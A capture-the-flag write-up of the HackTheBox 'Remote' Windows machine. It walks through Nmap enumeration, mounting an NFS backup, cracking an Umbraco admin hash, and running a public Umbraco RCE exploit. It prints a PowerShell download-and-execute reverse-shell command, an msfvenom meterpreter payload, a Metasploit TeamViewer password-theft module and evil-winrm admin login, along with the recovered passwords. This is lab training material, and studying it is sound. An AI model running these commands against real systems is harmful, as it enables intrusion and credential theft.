Hey ! Today's writeup is on Remote, an Easy Windows Box released on March 21st 2020 on HackTheBox.
If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/234
It was my first Windows box. It's been quite some time now that I wanted to do one, but it isn't easy to start from scratch. Indeed, Windows and Linux boxes aren't the same at all. While when starting Linux boxes I had experience with the Linux terminal, I had none with the Windows Powershell. Therefore, I struggled to get this box done, but now I did, and I am very happy to present to you my writeup of it.
Recon
Like always, I performed a Nmap scan
nmap -A -p- -T4 10.10.10.180I am using the same flags as always :
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)
Here are the scan results :
Nmap scan report for 10.10.10.180
Host is up (0.089s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/29%OT=21%CT=1%CU=43315%PV=Y%DS=2%DC=T%G=Y%TM=5EFA427
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m20s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-29T19:38:43
|_ start_date: N/A
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 88.03 ms 10.10.14.1
2 87.58 ms 10.10.10.180
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.54 secondsOwn user
After taking a close look a the result file, I noticed NFS files. NFS is a protocol that allows hosts to access files on a remote server. Keep in mind that Nmap is a very powerfull tool, that has many scripts to check all sorts of things. For example by doing
nmap --script=nfs-showmount 10.10.10.180you are checking for NFS mounting points. Here we get site_backup. It's a promising lead. All I had to do is mount it :
$ mkdir mnt
$ sudo mount 10.10.10.180:/site_backups mntAfter some enumeration by hand on the mounted folder, I found an .sdf file : App_Data/Umbraco.sdf. SFD files are compact databases saved in SQL CE Format (SQL Server Compact Format). It's a perfect place to find credentials.
Just before we take a look at it, the exploration of the website didn't seem to lead anywhere at first (I skipped directory busting, my mistake), but with this file, it is very likely that the website is based on the opensource CMS Umbraco, so I tried to navigate to : 10.10.10.180/Umbraco/. And Bingo !
I tried some basic SQL injections but without success, we will come back later with credentials.
Now back to our Umbraco.sdf. First thing I tried worked (a bit in a luck for once. 🙂
strings Umbraco.sdf | grep adminadminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}We get a username, and a password hash.
Let's get the password corresponding to the hash with crackstation (https://crackstation.net/)
We can now use the credentials admin@htb.local and baconandcheese to login to the Umbraco CMS page.
There is a way to upload files, that could prove itself useful later, but not to own user. For that part, I found a python script that can get access using a Umbraco vulnerability, when provided with username/password. Here is the link to it : https://github.com/noraj/Umbraco-RCE
You can pass a PowerShell command as an argument. To try it out, just pass "ls" or "dir".
$ python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "dir C:/users"
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 7/8/2020 2:57 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 7/8/2020 8:55 AM PublicWe could adjust the commands to printout the user flag, that is located in C:/users/Public/user.txt, or do something more fun, I hereby summon the reverse shell.
I used the mini-reverse.ps1 script. You can easily find it online, make sure to change your IP address to the one given by openvpn, and the port to the one you have forwarded. Then put it in a server folder, and start a little server :
$ mkdir server
$ cp mini-reverse.ps1 server/
$ cd server
$ sudo python -m http.server --bind 80 If you go to your web browser and type in
Once the python server is up and running start listening on the port you chose, for me 8888.
nc -lvnp 8888I explain a little VERY useful tip about Netcat based reverse shells in my "HackTheBox Beginner Guide", make sure to check it out if you're totally new to this, or even if not, to give me some advice 😉
Now that the server runs and Netcat is listening, just launch the reverse shell.
python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http:///mini-reverse.ps1')"
After a few seconds, a windows shell should pop up in the terminal you were listening with. If not check that your VPN is still running, that the request made to the server for mini-reverse.ps1 indicates 200, and that IPs and ports are the right ones. If everything is right, just kill everything and start over.
We just need to print the flag, and we're done for this part !
$ cd C:\users\Public
$ type user.txtOwn root
I found two ways to get root, one that depends on the access you have managed to establish, but is faster, and the other one that always works, but takes a bit longer to perform.
I'll show the second one in this writeup.
Just know that the other method is using the PowerUp.ps1 script to perform a ServiceAbuse to add an Administrator account to logging to with evil-winrm.
When looking at the processes running on the machine (by using ps), I noticed TeamViewer was running. As it is a graphical app, and Remote is a Easy box, it couldn't be running if it wasn't useful at some point.
I found a way to gather credentials in TeamViewer, through Metasploit. The only requirement is to acquire a meterpreter session. To do so I tried to get a reverse shell using the metasploit handler.
$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcpI first started the metasploitable framework, set the exploit to multi/handler and the payload to a TCP meterpreter reverse shell for windows 64bits.
You then need to specify your IP and port, and just start listening and your are good to go on this side.
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > set LHOST
LHOST =>
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.94:8888 The second part is to get the remote host to execute your reverse shell. I first tried the same method than before with the python script, but you then get a message that a meterpreter session was opened, but you will not get the prompt back. And that is because the multi/handler actually needs to have a sort of Trojan executed on the machine.
Luckily for us, that isn't hard with msfvenom (a complimentary tool to metasploit).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8888 -f exe > privesc.exe This will generate a Windows executable file, that we need to upload on the target machine. Told you that Umbraco file upload page was going to come in handy 😉
Go to media, and import the privesc.exe file. Then find where your file is. It is in one of the subdirectories in C:/inetpub/wwwroot/Media/.
$ python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "C:/inetpub/wwwroot/Media/1035/privesc.exe"Great ! We now have our meterpreter session !
[*] Started reverse TCP handler on 10.10.15.48:8888
[*] Sending stage (201283 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.15.48:8888 -> 10.10.10.180:49759) at 2020-07-08 16:11:42 +0200
meterpreter >To run the tool I spoke about, juste type the following command in meterpreter :
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/leo/.msf4/loot/20200708162410_default_10.10.10.180_host.teamviewer__598662.txtWe got our self a password 🙂
Let's see if it the admin password we are looking for. To connect to a windows machine with credentials, evil-winrm is a great tool. You can find it here : https://github.com/Hackplayers/evil-winrm
Here it how it's used :
$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/users/Administrator/Desktop/root.txt
69ee6ac83f153675310f9894b92e1ca2That's it for this writeup ! I hope you enjoyed, and see you for another one !